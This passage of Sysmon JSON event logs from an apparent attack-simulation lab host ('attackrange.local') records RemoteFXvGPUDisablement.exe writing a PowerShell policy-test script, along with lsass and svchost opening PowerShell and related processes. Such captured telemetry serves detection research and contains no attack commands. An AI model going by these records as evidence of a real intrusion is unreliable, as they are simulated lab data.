FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.553","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-00107F3E0100}","Image":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_awfn0abc.c05.ps1","CreationUtcTime":"2020-08-01 06:49:01.553","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:02.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:02.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","TargetProcessId":"2116","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:02.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010773D0100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:02.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010773D0100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:02.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:02.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","TargetProcessId":"2116","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:02.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010773D0100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:02.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010773D0100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:02.678\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00107F3E0100}\r\nTargetProcessId: 2168\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:02.678","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00107F3E0100}","TargetProcessId":"2168","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:02.678\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00107F3E0100}\r\nTargetProcessId: 2168\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:02.678","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00107F3E0100}","TargetProcessId":"2168","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:02.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00107F3E0100}\r\nTargetProcessId: 2168\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:02.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00107F3E0100}","TargetProcessId":"2168","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.053\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 